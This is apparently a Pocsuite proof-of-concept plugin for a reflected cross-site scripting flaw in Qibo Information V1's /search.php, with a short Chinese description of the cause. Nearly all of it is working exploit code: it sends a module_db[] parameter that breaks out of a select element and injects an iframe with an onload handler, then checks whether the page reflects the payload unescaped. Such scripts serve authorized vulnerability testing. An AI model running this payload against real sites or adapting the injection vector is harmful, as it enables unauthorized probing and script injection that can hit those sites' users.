Qibo Information V1 /search.php 跨站脚本漏洞

                                                #!/usr/bin/env python
# coding: utf-8

import re
from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register


class TestPOC(POCBase):
    vulID = '1643'  # vul ID
    version = '1'
    author = ['zhengdt']
    vulDate = '2014-12-09'
    createDate = '2014-12-09'
    updateDate = '2014-12-09'
    references = ['']
    name = 'Qibo Information V1 /search.php 跨站脚本漏洞 POC'
    appPowerLink = 'http://www.qibosoft.com'
    appName = 'Qibo Informationa'
    appVersion = 'V1'
    vulType = 'XSS'
    desc = '''
        由于全局变量可控，通过控制变量可以进行反射型 XSS。
    '''

    samples = ['']

    def _attack(self):
        return self._verify()

    def _verify(self):
        result = {}
        url = ('%s/search.php?module_db[]=</option></select><iframe onload'
            '=alert(1)><!--') % self.url
        response = req.get(url).content
        if '</select><iframe onload=alert(1)><!--</option>' in response:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = url

        return self.parse_attack(result)

    def parse_attack(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('Internet nothing returned')
        return output


register(TestPOC)